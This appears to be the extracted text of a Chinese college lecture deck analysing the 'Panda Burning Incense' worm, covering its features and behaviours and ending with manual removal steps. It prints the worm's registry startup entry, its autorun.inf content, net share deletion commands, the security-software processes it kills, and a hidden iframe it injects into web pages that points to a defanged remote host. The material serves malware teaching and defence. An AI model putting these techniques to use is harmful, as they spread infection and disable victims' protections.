熊猫烧香病毒剖析讲解.ppt

计算机病毒与防治 教学单元4-4 蠕虫病毒防治 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒特点 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒源码分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒主要行为分析 熊猫烧香病毒手工清除 熊猫烧香病毒手工清除 本讲小结 计算机病毒与防治课程小组 （3）创建启动项： [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe 熊猫烧香在注册表中添加启动项 计算机病毒与防治课程小组 （4）在各分区根目录生成病毒副本： X:\setup.exe X:\autorun.inf 其中autorun.inf中的内容是： [AutoRun] OPEN=setup.exe shellexecute=setup.exe shell\Auto\command=setup.exe 计算机病毒与防治课程小组 （5）使用net share命令关闭管理共享： cmd.exe /c net share X$ /del /y cmd.exe /c net share admin$ /del /y （6）修改“显示所有文件和文件夹”设置： [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL] CheckedValue=dword（7）尝试关闭安全软件相关窗口： 天网防火墙进程、VirusScan 、NOD32等 （8）尝试结束安全软件相关进程： Mcshield.exe VsTskMgr.exe等 计算机病毒与防治课程小组 （9）禁用安全软件相关服务： Schedule sharedaccess RsCCenter 等 （10）删除安全软件相关启动项： SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP （11）遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息： iframe src=hxxp:///wuhan/down.htm width=0 height=0 frameborder=0 /iframe （12）在访问过的目录下生成Desktop_.ini文件，内容为当前日期。 （13）此外，病毒还会尝试删除GHO文件。 计算机病毒与防治课程小组 病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中。 弱密码文件 计算机病毒与防治课程小组 （1）结束病毒进程： %System%\drivers\spoclsv.exe 查看当前运行spoclsv.exe的路径 （2）删除病毒文件： %System%\drivers\spoclsv.exe 不同的spoclsv.exe变种，此目录可不同。有的病毒变种可能在以下目录中：C:\WINDOWS\System32\Drivers\spoclsv.exe。 （3）删除病毒启动项： [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] svcshare=%System%\drivers\spoclsv.exe * Virus 重庆电子工程职业学院 计算机病毒与防治课程小组 熊猫烧香病毒源码分析 熊猫烧香病毒特点 熊猫烧香病毒行为分析 第二讲 熊猫烧香蠕虫病毒剖析 计算机病毒与防治课程小组 熊猫